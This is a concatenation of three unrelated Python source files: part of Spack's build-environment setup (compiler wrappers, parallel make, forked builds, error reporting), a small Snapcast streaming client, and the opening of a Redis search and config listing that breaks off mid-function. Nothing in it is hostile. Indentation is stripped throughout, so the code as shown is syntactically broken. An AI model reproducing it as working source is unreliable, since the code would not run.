SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
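# Illustrative usage sketch (not part of the original module): how install()
# code typically drives a MakeExecutable; 'make' is the module-scope object
# injected by _set_variables_for_single_module() below.
#
#   make()                           # runs `make -jN` when parallel builds are on
#   make('install', parallel=False)  # force a serial `make install`
#   make(jobs_env='NINJAJOBS')       # additionally export the job count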
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
    #   "suffix or operands invalid for 'movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
        # This avoids discrepancies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, pkg.spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(pkg.spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
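# Illustrative sketch (not part of the original): the flag_handler contract
# consumed above. A handler receives (pkg, flag_name, flag_values) and returns
# a triple of (inject_flags, env_flags, build_system_flags) lists; the policy
# below is purely hypothetical.
def _example_flag_handler(pkg, name, flags):
    if name == 'cflags':
        # route cflags through the compiler wrapper (SPACK_CFLAGS)
        return (flags, None, None)
    # hand everything else to the build system via flags_to_build_system_args
    return (None, None, flags)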
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
build_prefixes = [dep.prefix for dep in build_deps]
link_prefixes = [dep.prefix for dep in link_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
rpath_prefixes = [dep.prefix for dep in rpath_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
link_prefixes = filter_system_paths(link_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
rpath_prefixes = filter_system_paths(rpath_prefixes)
# Prefixes of all of the package's dependencies go in SPACK_DEPENDENCIES
env.set_path(SPACK_DEPENDENCIES, build_link_prefixes)
# These variables control compiler wrapper behavior
env.set_path(SPACK_RPATH_DEPS, rpath_prefixes)
env.set_path(SPACK_LINK_DEPS, link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Install prefix
env.set(SPACK_PREFIX, pkg.prefix)
# Install root prefix
env.set(SPACK_INSTALL, spack.store.root)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
environment = compiler.environment
for command, variable in iteritems(environment):
if command == 'set':
for name, value in iteritems(variable):
env.set(name, value)
elif command == 'unset':
for name, _ in iteritems(variable):
env.unset(name)
elif command == 'prepend-path':
for name, value in iteritems(variable):
env.prepend_path(name, value)
elif command == 'append-path':
for name, value in iteritems(variable):
env.append_path(name, value)
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('${PACKAGE}-${HASH:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# number of jobs spack will build with.
jobs = spack.config.get('config:build_jobs') or multiprocessing.cpu_count()
if not pkg.parallel:
jobs = 1
elif pkg.make_jobs:
jobs = pkg.make_jobs
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
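# Illustrative usage sketch (not part of the original): converting a PIC
# static archive from a package's install(), via the module-scope helper
# wired up in _set_variables_for_single_module() above.
#
#   static_to_shared_library('libfoo.a', version='1.2', compat_version='1')
#   # on linux this emits libfoo.so.1.2 with soname libfoo.so.1 and creates
#   # the libfoo.so and libfoo.so.1 symlinks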
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return rpaths
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
    Args:
        pkg (PackageBase): package under consideration
    Returns:
        list of str: standard arguments that would be used if this
        package were a CMakePackage instance.
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
    Args:
        pkg (PackageBase): package under consideration
    Returns:
        list of str: standard arguments that would be used if this
        package were a MesonPackage instance.
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
spack_env = EnvironmentModifications()
run_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, spack_env)
set_build_environment_variables(pkg, spack_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, spack_env)
# traverse in postorder so package can use vars from its dependencies
spec = pkg.spec
for dspec in pkg.spec.traverse(order='post', root=False,
deptype=('build', 'test')):
spkg = dspec.package
set_module_variables_for_package(spkg)
# Allow dependencies to modify the module
dpkg = dspec.package
dpkg.setup_dependent_package(pkg.module, spec)
dpkg.setup_dependent_environment(spack_env, run_env, spec)
set_module_variables_for_package(pkg)
pkg.setup_environment(spack_env, run_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the spack_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(spack_env, tty.warn)
spack_env.apply_modifications()
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopIteration as e:
# StopIteration is used to stop installations
# before the final stage, mainly for debug purposes
tty.msg(e)
child_pipe.send(None)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
if isinstance(child_result, ChildError):
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
    Any subclass of InstallError will be annotated by Spack with a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
            # The error happened in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
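# Illustrative round-trip sketch (not part of the original): ChildError
# instances survive the multiprocessing Pipe because __reduce__ above points
# pickle at _make_child_error.
#
#   import pickle
#   err = ChildError('boom', 'mod', 'RuntimeError', 'tb', None, ['ctx'])
#   assert isinstance(pickle.loads(pickle.dumps(err)), ChildError)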
|
__init__.py
|
""" Snapcast Client. """
import logging
import queue
import socket
import threading
import time
from snapcast.client.messages import (hello_packet, request_packet,
command_packet, packet,
basemessage, BASE_SIZE)
from snapcast.client.gstreamer import GstreamerAppSrc
__version__ = '0.0.1-py'
SERVER_PORT = 1704
SYNC_AFTER = 1
BUFFER_SIZE = 30
CMD_START_STREAM = 'startStream'
MSG_SERVER_SETTINGS = 'ServerSettings'
MSG_SAMPLE_FORMAT = 'SampleFormat'
MSG_WIRE_CHUNK = 'WireChunk'
MSG_HEADER = 'Header'
MSG_TIME = 'Time'
_LOGGER = logging.getLogger(__name__)
def mac():
""" Get MAC. """
from uuid import getnode as get_mac
return ':'.join(("%012x" % get_mac())[i:i+2] for i in range(0, 12, 2))
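# Illustrative note (not part of the original): mac() renders the host's
# 48-bit MAC as colon-separated hex pairs, e.g. 0xA1B2C3D4E5F6 becomes
# 'a1:b2:c3:d4:e5:f6'.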
class Client:
""" Snapcast Client. """
def __init__(self, host, port):
""" Setup. """
self._queue = queue.Queue()
self._buffer = queue.Queue()
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect((host, port))
self._source = GstreamerAppSrc()
self._last_sync = time.time()
self._connected = False
self._buffered = False
threading.Thread(target=self._read_socket, daemon=True).start()
threading.Thread(target=self._write_socket, daemon=True).start()
threading.Thread(target=self._play, daemon=True).start()
_LOGGER.info('Connected to %s:%s', host, port)
def register(self):
""" Transact with server. """
self._queue.put(hello_packet(socket.gethostname(), mac(), __version__))
self._queue.put(request_packet(MSG_SERVER_SETTINGS))
self._queue.put(request_packet(MSG_SAMPLE_FORMAT))
self._queue.put(request_packet(MSG_HEADER))
def request_start(self):
""" Indicate readiness to receive stream.
This is a blocking call.
"""
self._queue.put(command_packet(CMD_START_STREAM))
_LOGGER.info('Requesting stream')
self._source.run()
    def _recv_exact(self, length):
        # recv() may return fewer bytes than requested; loop until complete.
        data = b''
        while len(data) < length:
            chunk = self._socket.recv(length - len(data))
            if not chunk:
                raise ConnectionError('socket closed by server')
            data += chunk
        return data
    def _read_socket(self):
        """ Process incoming messages from socket. """
        while True:
            base_bytes = self._recv_exact(BASE_SIZE)
            base = basemessage.parse(base_bytes)
            payload_bytes = self._recv_exact(base.payload_length)
            self._handle_message(packet.parse(base_bytes + payload_bytes))
def _handle_message(self, data):
""" Handle messages. """
if data.type == MSG_SERVER_SETTINGS:
_LOGGER.info(data.payload)
elif data.type == MSG_SAMPLE_FORMAT:
_LOGGER.info(data.payload)
self._connected = True
elif data.type == MSG_TIME:
if not self._buffered:
_LOGGER.info('Buffering')
elif data.type == MSG_HEADER:
# Push to app source and start playing.
_LOGGER.info(data.payload.codec.decode('ascii'))
self._source.push(data.payload.header)
self._source.play()
elif data.type == MSG_WIRE_CHUNK:
# Add chunks to play queue.
self._buffer.put(data.payload.chunk)
if self._buffer.qsize() > BUFFER_SIZE:
self._buffered = True
if self._buffer.empty():
self._buffered = False
def _write_socket(self):
""" Pass messages from queue to socket. """
while True:
now = time.time()
if self._connected and (self._last_sync + SYNC_AFTER) < now:
self._queue.put(request_packet(MSG_TIME))
self._last_sync = now
if not self._queue.empty():
self._socket.send(self._queue.get())
def _play(self):
""" Relay buffer to app source. """
while True:
if self._buffered:
self._source.push(self._buffer.get())
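# Illustrative usage sketch (not part of the original): a minimal session,
# assuming a snapserver is reachable on the default port.
#
#   client = Client('localhost', SERVER_PORT)
#   client.register()
#   client.request_start()  # blocks while the gstreamer main loop runs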
|
ch10_listing_source.py
|
import binascii
from collections import defaultdict
from datetime import date
from decimal import Decimal
import functools
import json
from queue import Empty, Queue
import threading
import time
import unittest
import uuid
import redis
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
t = CHECKED.get(key)
if (not t) or t < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
config = dict((str(k), config[k]) for k in config)
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
config_connection = None
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
            config = get_config(                               #G
                config_connection, 'redis', component, wait)   #G
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
def index_document(conn, docid, words, scores):
pipeline = conn.pipeline(True)
for word in words: #I
pipeline.sadd('idx:' + word, docid) #I
pipeline.hmset('kb:doc:%s'%docid, scores)
return len(pipeline.execute()) #J
def parse_and_search(conn, query, ttl):
id = str(uuid.uuid4())
conn.sinterstore('idx:' + id,
['idx:'+key for key in query])
conn.expire('idx:' + id, ttl)
return id
def search_and_sort(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
desc = sort.startswith('-') #B
sort = sort.lstrip('-') #B
by = "kb:doc:*->" + sort #B
alpha = sort not in ('updated', 'id', 'created') #I
if id and not conn.expire(id, ttl): #C
id = None #C
if not id: #D
